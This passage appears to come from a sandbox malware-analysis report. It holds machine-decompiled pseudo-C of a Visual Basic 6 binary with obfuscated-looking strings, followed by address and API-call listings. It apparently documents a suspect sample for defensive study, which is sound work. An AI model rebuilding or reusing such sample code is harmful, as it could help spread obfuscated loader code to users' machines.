                  					L00401376();
                  					_v124 = _t919;
                  					if( *0x4123c0 != 0) {
                  						_v1416 = 0x4123c0;
                  					} else {
                  						_push(0x4123c0);
                  						_push(0x403004);
                  						L00401388();
                  						_v1416 = 0x4123c0;
                  					}
                  					_v972 =  *_v1416;
                  					_t754 =  &_v848;
                  					L00401370();
                  					_t597 =  *((intOrPtr*)( *_v972 + 0x10))(_v972, _t754, _t754, _a4);
                  					asm("fclex");
                  					_v976 = _t597;
                  					if(_v976 >= 0) {
                  						_v1420 = _v1420 & 0x00000000;
                  					} else {
                  						_push(0x10);
                  						_push(0x402ff4);
                  						_push(_v972);
                  						_push(_v976);
                  						L00401394();
                  						_v1420 = _t597;
                  					}
                  					L00401382();
                  				}
                  				_push(0x4c5969);
                  				E00402EFC();
                  				_v948 = _t597;
                  				L0040138E();
                  				if(_v948 == 0x1e60) {
                  					if( *0x4123c0 != 0) {
                  						_v1424 = 0x4123c0;
                  					} else {
                  						_push(0x4123c0);
                  						_push(0x403004);
                  						L00401388();
                  						_v1424 = 0x4123c0;
                  					}
                  					_v972 =  *_v1424;
                  					_t710 =  *((intOrPtr*)( *_v972 + 0x14))(_v972,  &_v848);
                  					asm("fclex");
                  					_v976 = _t710;
                  					if(_v976 >= 0) {
                  						_v1428 = _v1428 & 0x00000000;
                  					} else {
                  						_push(0x14);
                  						_push(0x402ff4);
                  						_push(_v972);
                  						_push(_v976);
                  						L00401394();
                  						_v1428 = _t710;
                  					}
                  					_v980 = _v848;
                  					_t715 =  *((intOrPtr*)( *_v980 + 0x108))(_v980,  &_v944);
                  					asm("fclex");
                  					_v984 = _t715;
                  					if(_v984 >= 0) {
                  						_v1432 = _v1432 & 0x00000000;
                  					} else {
                  						_push(0x108);
                  						_push(0x403014);
                  						_push(_v980);
                  						_push(_v984);
                  						L00401394();
                  						_v1432 = _t715;
                  					}
                  					_v72 = _v944;
                  					L00401382();
                  					if( *0x4123c0 != 0) {
                  						_v1436 = 0x4123c0;
                  					} else {
                  						_push(0x4123c0);
                  						_push(0x403004);
                  						L00401388();
                  						_v1436 = 0x4123c0;
                  					}
                  					_v972 =  *_v1436;
                  					_t722 =  *((intOrPtr*)( *_v972 + 0x14))(_v972,  &_v848);
                  					asm("fclex");
                  					_v976 = _t722;
                  					if(_v976 >= 0) {
                  						_v1440 = _v1440 & 0x00000000;
                  					} else {
                  						_push(0x14);
                  						_push(0x402ff4);
                  						_push(_v972);
                  						_push(_v976);
                  						L00401394();
                  						_v1440 = _t722;
                  					}
                  					_v980 = _v848;
                  					_t727 =  *((intOrPtr*)( *_v980 + 0xc8))(_v980,  &_v944);
                  					asm("fclex");
                  					_v984 = _t727;
                  					if(_v984 >= 0) {
                  						_v1444 = _v1444 & 0x00000000;
                  					} else {
                  						_push(0xc8);
                  						_push(0x403014);
                  						_push(_v980);
                  						_push(_v984);
                  						L00401394();
                  						_v1444 = _t727;
                  					}
                  					_v144 = _v944;
                  					L00401382();
                  					if( *0x4123c0 != 0) {
                  						_v1448 = 0x4123c0;
                  					} else {
                  						_push(0x4123c0);
                  						_push(0x403004);
                  						L00401388();
                  						_v1448 = 0x4123c0;
                  					}
                  					_v972 =  *_v1448;
                  					_t734 =  *((intOrPtr*)( *_v972 + 0x1c))(_v972,  &_v848);
                  					asm("fclex");
                  					_v976 = _t734;
                  					if(_v976 >= 0) {
                  						_v1452 = _v1452 & 0x00000000;
                  					} else {
                  						_push(0x1c);
                  						_push(0x402ff4);
                  						_push(_v972);
                  						_push(_v976);
                  						L00401394();
                  						_v1452 = _t734;
                  					}
                  					_v980 = _v848;
                  					_v916 = 0x80020004;
                  					_v924 = 0xa;
                  					L004011F0();
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					_t739 =  *((intOrPtr*)( *_v980 + 0x60))(_v980, L"Receptionsassistenter4", 0x10);
                  					asm("fclex");
                  					_v984 = _t739;
                  					if(_v984 >= 0) {
                  						_v1456 = _v1456 & 0x00000000;
                  					} else {
                  						_push(0x60);
                  						_push(0x403024);
                  						_push(_v980);
                  						_push(_v984);
                  						L00401394();
                  						_v1456 = _t739;
                  					}
                  					L00401382();
                  				}
                  				_v968 = 0x8b685910;
                  				_v964 = 0x5afc;
                  				_v960 = 0xe92196e0;
                  				_v956 = 0x5af5;
                  				 *((intOrPtr*)( *_a4 + 0x70c))(_a4, L"Enervous", 0x69ca,  &_v960,  &_v968,  &_v944);
                  				_v180 = _v944;
                  				_v968 = 0x4e4866f0;
                  				_v964 = 0x5b02;
                  				_v960 =  *0x401170;
                  				_v948 = 0x1d68ea;
                  				_t611 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v948, L"Holmberry5",  &_v960,  &_v968,  &_v952);
                  				_v972 = _t611;
                  				if(_v972 >= 0) {
                  					_v1460 = _v1460 & 0x00000000;
                  				} else {
                  					_push(0x6fc);
                  					_push(0x402b10);
                  					_push(_a4);
                  					_push(_v972);
                  					L00401394();
                  					_v1460 = _t611;
                  				}
                  				_v140 = _v952;
                  				_v944 = 0x5fc6;
                  				_t617 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4, L"disuniter",  &_v944,  &_v948);
                  				_v972 = _t617;
                  				if(_v972 >= 0) {
                  					_v1464 = _v1464 & 0x00000000;
                  				} else {
                  					_push(0x6f8);
                  					_push(0x402b10);
                  					_push(_a4);
                  					_push(_v972);
                  					L00401394();
                  					_v1464 = _t617;
                  				}
                  				_v120 = _v948;
                  				L0040136A();
                  				_t622 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v836, 0xe1,  &_v960);
                  				_v972 = _t622;
                  				if(_v972 >= 0) {
                  					_v1468 = _v1468 & 0x00000000;
                  				} else {
                  					_push(0x700);
                  					_push(0x402b10);
                  					_push(_a4);
                  					_push(_v972);
                  					L00401394();
                  					_v1468 = _t622;
                  				}
                  				_v136 = _v960;
                  				L00401364();
                  				L0040136A();
                  				_t627 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v836, 0x5188,  &_v960);
                  				_v972 = _t627;
                  				if(_v972 >= 0) {
                  					_v1472 = _v1472 & 0x00000000;
                  				} else {
                  					_push(0x700);
                  					_push(0x402b10);
                  					_push(_a4);
                  					_push(_v972);
                  					L00401394();
                  					_v1472 = _t627;
                  				}
                  				_v808 = _v960;
                  				L00401364();
                  				if( *0x412010 != 0) {
                  					_v1476 = 0x412010;
                  				} else {
                  					_push("(RO");
                  					_push(0x40246c);
                  					L00401388();
                  					_v1476 = 0x412010;
                  				}
                  				_t631 =  &_v848;
                  				L00401358();
                  				_v972 = _t631;
                  				_t635 =  *((intOrPtr*)( *_v972 + 0x1b8))(_v972,  &_v852, _t631,  *((intOrPtr*)( *((intOrPtr*)( *_v1476)) + 0x304))( *_v1476));
                  				asm("fclex");
                  				_v976 = _t635;
                  				if(_v976 >= 0) {
                  					_v1480 = _v1480 & 0x00000000;
                  				} else {
                  					_push(0x1b8);
                  					_push(0x4030dc);
                  					_push(_v972);
                  					_push(_v976);
                  					L00401394();
                  					_v1480 = _t635;
                  				}
                  				L0040135E();
                  				_v968 = 0x5f6bf5a0;
                  				_v964 = 0x5af8;
                  				_v960 =  *0x401168;
                  				_v948 = 0x841700;
                  				_t640 =  &_v872;
                  				L00401352();
                  				L004013B2();
                  				_t644 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v948, _t640, _t640,  &_v960,  &_v968,  &_v952,  &_v872, _v852, 0, 0);
                  				_v980 = _t644;
                  				if(_v980 >= 0) {
                  					_v1484 = _v1484 & 0x00000000;
                  				} else {
                  					_push(0x6fc);
                  					_push(0x402b10);
                  					_push(_a4);
                  					_push(_v980);
                  					L00401394();
                  					_v1484 = _t644;
                  				}
                  				_v92 = _v952;
                  				L00401364();
                  				_push( &_v852);
                  				_push( &_v848);
                  				_push(2);
                  				L0040134C();
                  				L004013A6();
                  				if( *0x412010 != 0) {
                  					_v1488 = 0x412010;
                  				} else {
                  					_push("(RO");
                  					_push(0x40246c);
                  					L00401388();
                  					_v1488 = 0x412010;
                  				}
                  				_t651 =  &_v848;
                  				L00401358();
                  				_v972 = _t651;
                  				_t655 =  *((intOrPtr*)( *_v972 + 0x100))(_v972,  &_v852, _t651,  *((intOrPtr*)( *((intOrPtr*)( *_v1488)) + 0x300))( *_v1488));
                  				asm("fclex");
                  				_v976 = _t655;
                  				if(_v976 >= 0) {
                  					_v1492 = _v1492 & 0x00000000;
                  				} else {
                  					_push(0x100);
                  					_push(0x4030ec);
                  					_push(_v972);
                  					_push(_v976);
                  					L00401394();
                  					_v1492 = _t655;
                  				}
                  				L0040135E();
                  				_v968 = 0xef1aa800;
                  				_v964 = 0x5afc;
                  				_v960 =  *0x401160;
                  				_t657 =  &_v872;
                  				L00401346();
                  				_v948 = _t657;
                  				_t664 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v948, L"SLAVESJLENE",  &_v960,  &_v968,  &_v952, _t657,  &_v872, _v852, 0, 0);
                  				_v980 = _t664;
                  				if(_v980 >= 0) {
                  					_v1496 = _v1496 & 0x00000000;
                  				} else {
                  					_push(0x6fc);
                  					_push(0x402b10);
                  					_push(_a4);
                  					_push(_v980);
                  					L00401394();
                  					_v1496 = _t664;
                  				}
                  				_v88 = _v952;
                  				L0040134C();
                  				L004013A6();
                  				_t670 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 2,  &_v848,  &_v852);
                  				asm("fclex");
                  				_v972 = _t670;
                  				if(_v972 >= 0) {
                  					_v1500 = _v1500 & 0x00000000;
                  				} else {
                  					_push(0x2b4);
                  					_push(0x402ae0);
                  					_push(_a4);
                  					_push(_v972);
                  					L00401394();
                  					_v1500 = _t670;
                  				}
                  				L112:
                  				if( *0x412010 != 0) {
                  					_v1504 = 0x412010;
                  				} else {
                  					_push("(RO");
                  					_push(0x40246c);
                  					L00401388();
                  					_v1504 = 0x412010;
                  				}
                  				_t674 =  &_v848;
                  				L00401358();
                  				_v972 = _t674;
                  				_t678 =  *((intOrPtr*)( *_v972 + 0x150))(_v972,  &_v836, _t674,  *((intOrPtr*)( *((intOrPtr*)( *_v1504)) + 0x308))( *_v1504));
                  				asm("fclex");
                  				_v976 = _t678;
                  				if(_v976 >= 0) {
                  					_v1508 = _v1508 & 0x00000000;
                  				} else {
                  					_push(0x150);
                  					_push(0x4030dc);
                  					_push(_v972);
                  					_push(_v976);
                  					L00401394();
                  					_v1508 = _t678;
                  				}
                  				_v1332 = _v836;
                  				_v836 = _v836 & 0x00000000;
                  				L004013B2();
                  				_t684 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v840, 0x55c3,  &_v960);
                  				_v980 = _t684;
                  				if(_v980 >= 0) {
                  					_v1512 = _v1512 & 0x00000000;
                  				} else {
                  					_push(0x700);
                  					_push(0x402b10);
                  					_push(_a4);
                  					_push(_v980);
                  					L00401394();
                  					_v1512 = _t684;
                  				}
                  				_v800 = _v960;
                  				L00401364();
                  				L00401382();
                  				if( *0x412010 != 0) {
                  					_v1516 = 0x412010;
                  				} else {
                  					_push("(RO");
                  					_push(0x40246c);
                  					L00401388();
                  					_v1516 = 0x412010;
                  				}
                  				_t688 =  &_v848;
                  				L00401358();
                  				_v972 = _t688;
                  				_t692 =  *((intOrPtr*)( *_v972 + 0x150))(_v972,  &_v836, _t688,  *((intOrPtr*)( *((intOrPtr*)( *_v1516)) + 0x304))( *_v1516));
                  				asm("fclex");
                  				_v976 = _t692;
                  				if(_v976 >= 0) {
                  					_v1520 = _v1520 & 0x00000000;
                  				} else {
                  					_push(0x150);
                  					_push(0x4030dc);
                  					_push(_v972);
                  					_push(_v976);
                  					L00401394();
                  					_v1520 = _t692;
                  				}
                  				_v1336 = _v836;
                  				_v836 = _v836 & 0x00000000;
                  				L004013B2();
                  				_t698 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v840, 0x5e86,  &_v960);
                  				_v980 = _t698;
                  				if(_v980 >= 0) {
                  					_v1524 = _v1524 & 0x00000000;
                  				} else {
                  					_push(0x700);
                  					_push(0x402b10);
                  					_push(_a4);
                  					_push(_v980);
                  					L00401394();
                  					_v1524 = _t698;
                  				}
                  				_v116 = _v960;
                  				L00401364();
                  				L00401382();
                  				_v916 = 1;
                  				_v924 = 2;
                  				_push( &_v164);
                  				_push( &_v924);
                  				_push( &_v872);
                  				L0040133A();
                  				L00401340();
                  				_v916 = 0x1ffff;
                  				_v924 = 0x8003;
                  				_push( &_v164);
                  				_t703 =  &_v924;
                  				_push(_t703);
                  				L00401334();
                  				if(_t703 == 0) {
                  					goto L132;
                  				}
                  				goto L112;
                  				L132:
                  				_v84 = 0;
                  				_push(0x407269);
                  				goto ( *__edx);
                  			}
                  0x00408bd5
                  0x00408be4
                  0x00408bf1
                  0x00408c0e
                  0x00408bf3
                  0x00408bf3
                  0x00408bf8
                  0x00408bfd
                  0x00408c02
                  0x00408c02
                  0x00408c20
                  0x00408c3b
                  0x00408c3e
                  0x00408c40
                  0x00408c4d
                  0x00408c6f
                  0x00408c4f
                  0x00408c4f
                  0x00408c51
                  0x00408c56
                  0x00408c5c
                  0x00408c62
                  0x00408c67
                  0x00408c67
                  0x00408c7c
                  0x00408c97
                  0x00408c9d
                  0x00408c9f
                  0x00408cac
                  0x00408cd1
                  0x00408cae
                  0x00408cae
                  0x00408cb3
                  0x00408cb8
                  0x00408cbe
                  0x00408cc4
                  0x00408cc9
                  0x00408cc9
                  0x00408cdf
                  0x00408ce9
                  0x00408cf5
                  0x00408d12
                  0x00408cf7
                  0x00408cf7
                  0x00408cfc
                  0x00408d01
                  0x00408d06
                  0x00408d06
                  0x00408d24
                  0x00408d3f
                  0x00408d42
                  0x00408d44
                  0x00408d51
                  0x00408d73
                  0x00408d53
                  0x00408d53
                  0x00408d55
                  0x00408d5a
                  0x00408d60
                  0x00408d66
                  0x00408d6b
                  0x00408d6b
                  0x00408d80
                  0x00408d9b
                  0x00408da1
                  0x00408da3
                  0x00408db0
                  0x00408dd5
                  0x00408db2
                  0x00408db2
                  0x00408db7
                  0x00408dbc
                  0x00408dc2
                  0x00408dc8
                  0x00408dcd
                  0x00408dcd
                  0x00408de3
                  0x00408df0
                  0x00408dfc
                  0x00408e19
                  0x00408dfe
                  0x00408dfe
                  0x00408e03
                  0x00408e08
                  0x00408e0d
                  0x00408e0d
                  0x00408e2b
                  0x00408e46
                  0x00408e49
                  0x00408e4b
                  0x00408e58
                  0x00408e7a
                  0x00408e5a
                  0x00408e5a
                  0x00408e5c
                  0x00408e61
                  0x00408e67
                  0x00408e6d
                  0x00408e72
                  0x00408e72
                  0x00408e87
                  0x00408e8d
                  0x00408e97
                  0x00408ea4
                  0x00408eb1
                  0x00408eb2
                  0x00408eb3
                  0x00408eb4
                  0x00408ec8
                  0x00408ecb
                  0x00408ecd
                  0x00408eda
                  0x00408efc
                  0x00408edc
                  0x00408edc
                  0x00408ede
                  0x00408ee3
                  0x00408ee9
                  0x00408eef
                  0x00408ef4
                  0x00408ef4
                  0x00408f09
                  0x00408f09
                  0x00408f0e
                  0x00408f18
                  0x00408f22
                  0x00408f2c
                  0x00408f5d
                  0x00408f6a
                  0x00408f71
                  0x00408f7b
                  0x00408f8b
                  0x00408f91
                  0x00408fc4
                  0x00408fca
                  0x00408fd7
                  0x00408ff9
                  0x00408fd9
                  0x00408fd9
                  0x00408fde
                  0x00408fe3
                  0x00408fe6
                  0x00408fec
                  0x00408ff1
                  0x00408ff1
                  0x00409006
                  0x0040900c
                  0x00409030
                  0x00409036
                  0x00409043
                  0x00409065
                  0x00409045
                  0x00409045
                  0x0040904a
                  0x0040904f
                  0x00409052
                  0x00409058
                  0x0040905d
                  0x0040905d
                  0x00409072
                  0x00409080
                  0x004090a0
                  0x004090a6
                  0x004090b3
                  0x004090d5
                  0x004090b5
                  0x004090b5
                  0x004090ba
                  0x004090bf
                  0x004090c2
                  0x004090c8
                  0x004090cd
                  0x004090cd
                  0x004090e2
                  0x004090ee
                  0x004090fe
                  0x0040911e
                  0x00409124
                  0x00409131
                  0x00409153
                  0x00409133
                  0x00409133
                  0x00409138
                  0x0040913d
                  0x00409140
                  0x00409146
                  0x0040914b
                  0x0040914b
                  0x00409160
                  0x0040916c
                  0x00409178
                  0x00409195
                  0x0040917a
                  0x0040917a
                  0x0040917f
                  0x00409184
                  0x00409189
                  0x00409189
                  0x004091b9
                  0x004091c0
                  0x004091c5
                  0x004091e0
                  0x004091e6
                  0x004091e8
                  0x004091f5
                  0x0040921a
                  0x004091f7
                  0x004091f7
                  0x004091fc
                  0x00409201
                  0x00409207
                  0x0040920d
                  0x00409212
                  0x00409212
                  0x00409232
                  0x0040923a
                  0x00409244
                  0x00409254
                  0x0040925a
                  0x00409279
                  0x00409280
                  0x0040928d
                  0x004092a2
                  0x004092a8
                  0x004092b5
                  0x004092d7
                  0x004092b7
                  0x004092b7
                  0x004092bc
                  0x004092c1
                  0x004092c4
                  0x004092ca
                  0x004092cf
                  0x004092cf
                  0x004092e4
                  0x004092ed
                  0x004092f8
                  0x004092ff
                  0x00409300
                  0x00409302
                  0x00409310
                  0x0040931c
                  0x00409339
                  0x0040931e
                  0x0040931e
                  0x00409323
                  0x00409328
                  0x0040932d
                  0x0040932d
                  0x0040935d
                  0x00409364
                  0x00409369
                  0x00409384
                  0x0040938a
                  0x0040938c
                  0x00409399
                  0x004093be
                  0x0040939b
                  0x0040939b
                  0x004093a0
                  0x004093a5
                  0x004093ab
                  0x004093b1
                  0x004093b6
                  0x004093b6
                  0x004093d6
                  0x004093de
                  0x004093e8
                  0x004093f8
                  0x004093fe
                  0x00409405
                  0x0040940a
                  0x00409439
                  0x0040943f
                  0x0040944c
                  0x0040946e
                  0x0040944e
                  0x0040944e
                  0x00409453
                  0x00409458
                  0x0040945b
                  0x00409461
                  0x00409466
                  0x00409466
                  0x0040947b
                  0x0040948e
                  0x0040949c
                  0x004094a9
                  0x004094af
                  0x004094b1
                  0x004094be
                  0x004094e0
                  0x004094c0
                  0x004094c0
                  0x004094c5
                  0x004094ca
                  0x004094cd
                  0x004094d3
                  0x004094d8
                  0x004094d8
                  0x00000000
                  0x004094e7
                  0x004094ee
                  0x0040950b
                  0x004094f0
                  0x004094f0
                  0x004094f5
                  0x004094fa
                  0x004094ff
                  0x004094ff
                  0x0040952f
                  0x00409536
                  0x0040953b
                  0x00409556
                  0x0040955c
                  0x0040955e
                  0x0040956b
                  0x00409590
                  0x0040956d
                  0x0040956d
                  0x00409572
                  0x00409577
                  0x0040957d
                  0x00409583
                  0x00409588
                  0x00409588
                  0x0040959d
                  0x004095a3
                  0x004095b6
                  0x004095d6
                  0x004095dc
                  0x004095e9
                  0x0040960b
                  0x004095eb
                  0x004095eb
                  0x004095f0
                  0x004095f5
                  0x004095f8
                  0x004095fe
                  0x00409603
                  0x00409603
                  0x00409618
                  0x00409624
                  0x0040962f
                  0x0040963b
                  0x00409658
                  0x0040963d
                  0x0040963d
                  0x00409642
                  0x00409647
                  0x0040964c
                  0x0040964c
                  0x0040967c
                  0x00409683
                  0x00409688
                  0x004096a3
                  0x004096a9
                  0x004096ab
                  0x004096b8
                  0x004096dd
                  0x004096ba
                  0x004096ba
                  0x004096bf
                  0x004096c4
                  0x004096ca
                  0x004096d0
                  0x004096d5
                  0x004096d5
                  0x004096ea
                  0x004096f0
                  0x00409703
                  0x00409723
                  0x00409729
                  0x00409736
                  0x00409758
                  0x00409738
                  0x00409738
                  0x0040973d
                  0x00409742
                  0x00409745
                  0x0040974b
                  0x00409750
                  0x00409750
                  0x00409765
                  0x0040976e
                  0x00409779
                  0x0040977e
                  0x00409788
                  0x00409798
                  0x0040979f
                  0x004097a6
                  0x004097a7
                  0x004097b4
                  0x004097b9
                  0x004097c3
                  0x004097d3
                  0x004097d4
                  0x004097da
                  0x004097db
                  0x004097e5
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004097ec
                  0x004097ec
                  0x004097f8
                  0x004097fb

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004011F6), ref: 00408462
                  • __vbaAryConstruct2.MSVBVM60(?,004031F4,00000003,?,?,?,?,004011F6), ref: 0040849C
                  • __vbaStrCat.MSVBVM60(00402FE0,00402FE0,?,004031F4,00000003,?,?,?,?,004011F6), ref: 004084AB
                  • #617.MSVBVM60(?,00000008,00000001), ref: 004084D0
                  • __vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,00000008,00000001), ref: 004084F7
                  • __vbaFreeVarList.MSVBVM60(00000002,00000008,?,00008008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408513
                  • #536.MSVBVM60(00000002), ref: 00408545
                  • __vbaStrMove.MSVBVM60(00000002), ref: 00408552
                  • __vbaFreeVar.MSVBVM60(00000002), ref: 0040855D
                  • #703.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,00000002), ref: 00408585
                  • __vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,00000002), ref: 0040858F
                  • __vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,00000002), ref: 0040859A
                  • __vbaFpI4.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,00000002), ref: 004085A5
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401180,00402AE0,00000064), ref: 004085D7
                  • #536.MSVBVM60(00000002), ref: 00408606
                  • __vbaStrMove.MSVBVM60(00000002), ref: 00408613
                  • __vbaFreeVar.MSVBVM60(00000002), ref: 0040861E
                  • __vbaSetSystemError.MSVBVM60(?,00000002), ref: 00408635
                  • __vbaNew2.MSVBVM60(00403004,004123C0), ref: 0040865A
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402FF4,00000014), ref: 004086BF
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403014,000000C0), ref: 00408721
                  • __vbaFreeObj.MSVBVM60(00000000,?,00403014,000000C0), ref: 00408749
                  • __vbaNew2.MSVBVM60(00403004,004123C0), ref: 00408761
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402FF4,00000014), ref: 004087C6
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403014,000000F8), ref: 00408828
                  • __vbaStrMove.MSVBVM60(00000000,?,00403014,000000F8), ref: 0040885B
                  • __vbaFreeObj.MSVBVM60(00000000,?,00403014,000000F8), ref: 00408866
                  • __vbaNew2.MSVBVM60(00403004,004123C0), ref: 0040887E
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402FF4,0000001C), ref: 004088E3
                  • __vbaChkstk.MSVBVM60(?), ref: 00408921
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403024,00000054), ref: 00408967
                  • __vbaChkstk.MSVBVM60(00000000,?,00403024,00000054), ref: 004089A7
                  • __vbaLateIdSt.MSVBVM60(?,00000000), ref: 004089C0
                  • __vbaFreeObj.MSVBVM60(?,00000000), ref: 004089CB
                  • __vbaFreeVar.MSVBVM60(?,00000000), ref: 004089D6
                  • __vbaSetSystemError.MSVBVM60(008966DA), ref: 004089EB
                  • __vbaNew2.MSVBVM60(00403004,004123C0,008966DA), ref: 00408A13
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402FF4,00000014), ref: 00408A78
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403014,00000110), ref: 00408ADA
                  • __vbaStrMove.MSVBVM60(00000000,?,00403014,00000110), ref: 00408B0D
                  • __vbaFreeObj.MSVBVM60(00000000,?,00403014,00000110), ref: 00408B18
                  • #535.MSVBVM60(00000000,?,00403014,00000110), ref: 00408B1D
                  • __vbaNew2.MSVBVM60(00403004,004123C0), ref: 00408B38
                  • __vbaObjSetAddref.MSVBVM60(?,00401180), ref: 00408B6B
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402FF4,00000010), ref: 00408BA6
                  • __vbaFreeObj.MSVBVM60(00000000,?,00402FF4,00000010), ref: 00408BC0
                  • __vbaSetSystemError.MSVBVM60(004C5969,008966DA), ref: 00408BD5
                  • __vbaNew2.MSVBVM60(00403004,004123C0,004C5969,008966DA), ref: 00408BFD
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402FF4,00000014), ref: 00408C62
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403014,00000108), ref: 00408CC4
                  • __vbaFreeObj.MSVBVM60(00000000,?,00403014,00000108), ref: 00408CE9
                  • __vbaNew2.MSVBVM60(00403004,004123C0), ref: 00408D01
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402FF4,00000014), ref: 00408D66
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403014,000000C8), ref: 00408DC8
                  • __vbaFreeObj.MSVBVM60(00000000,?,00403014,000000C8), ref: 00408DF0
                  • __vbaNew2.MSVBVM60(00403004,004123C0), ref: 00408E08
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402FF4,0000001C), ref: 00408E6D
                  • __vbaChkstk.MSVBVM60(00000000,?,00402FF4,0000001C), ref: 00408EA4
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403024,00000060), ref: 00408EEF
                  • __vbaFreeObj.MSVBVM60(00000000,?,00403024,00000060), ref: 00408F09
                  • __vbaHresultCheckObj.MSVBVM60(?,00401180,00402B10,000006FC,?,?,?,004C5969,008966DA), ref: 00408FEC
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401180,00402B10,000006F8), ref: 00409058
                  • __vbaStrCopy.MSVBVM60(00000000,00401180,00402B10,000006F8), ref: 00409080
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401180,00402B10,00000700), ref: 004090C8
                  • __vbaFreeStr.MSVBVM60(00000000,00401180,00402B10,00000700), ref: 004090EE
                  • __vbaStrCopy.MSVBVM60(00000000,00401180,00402B10,00000700), ref: 004090FE
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401180,00402B10,00000700), ref: 00409146
                  • __vbaFreeStr.MSVBVM60(00000000,00401180,00402B10,00000700), ref: 0040916C
                  • __vbaNew2.MSVBVM60(0040246C,(RO), ref: 00409184
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 004091C0
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004030DC,000001B8), ref: 0040920D
                  • __vbaLateIdCallLd.MSVBVM60(00000002,?,00000000,00000000), ref: 00409232
                  • __vbaStrVarMove.MSVBVM60(?,?,5F6BF5A0,?), ref: 00409280
                  • __vbaStrMove.MSVBVM60(?,?,5F6BF5A0,?), ref: 0040928D
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401180,00402B10,000006FC), ref: 004092CA
                  • __vbaFreeStr.MSVBVM60(00000000,00401180,00402B10,000006FC), ref: 004092ED
                  • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00409302
                  • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,004011F6), ref: 00409310
                  • __vbaNew2.MSVBVM60(0040246C,(RO,?,?,?,?,?,?,?,?,?,004011F6), ref: 00409328
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00409364
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004030EC,00000100), ref: 004093B1
                  • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 004093D6
                  • __vbaI4Var.MSVBVM60(?), ref: 00409405
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401180,00402B10,000006FC), ref: 00409461
                  • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040948E
                  • __vbaFreeVar.MSVBVM60(?,?,?,?,?,0040246C,(RO), ref: 0040949C
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401180,00402AE0,000002B4), ref: 004094D3
                  • __vbaNew2.MSVBVM60(0040246C,(RO,00008003,?,?,00000002,?), ref: 004094FA
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00409536
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004030DC,00000150), ref: 00409583
                  • __vbaStrMove.MSVBVM60(00000000,00000000,004030DC,00000150), ref: 004095B6
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401180,00402B10,00000700), ref: 004095FE
                  • __vbaFreeStr.MSVBVM60(00000000,00401180,00402B10,00000700), ref: 00409624
                  • __vbaFreeObj.MSVBVM60(00000000,00401180,00402B10,00000700), ref: 0040962F
                  • __vbaNew2.MSVBVM60(0040246C,(RO,00000000,00401180,00402B10,00000700), ref: 00409647
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00409683
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004030DC,00000150), ref: 004096D0
                  • __vbaStrMove.MSVBVM60(00000000,00000000,004030DC,00000150), ref: 00409703
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401180,00402B10,00000700), ref: 0040974B
                  • __vbaFreeStr.MSVBVM60(00000000,00401180,00402B10,00000700), ref: 0040976E
                  • __vbaFreeObj.MSVBVM60(00000000,00401180,00402B10,00000700), ref: 00409779
                  • __vbaVarAdd.MSVBVM60(?,00000002,?), ref: 004097A7
                  • __vbaVarMove.MSVBVM60(?,00000002,?), ref: 004097B4
                  • __vbaVarTstLt.MSVBVM60(00008003,?,?,00000002,?), ref: 004097DB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
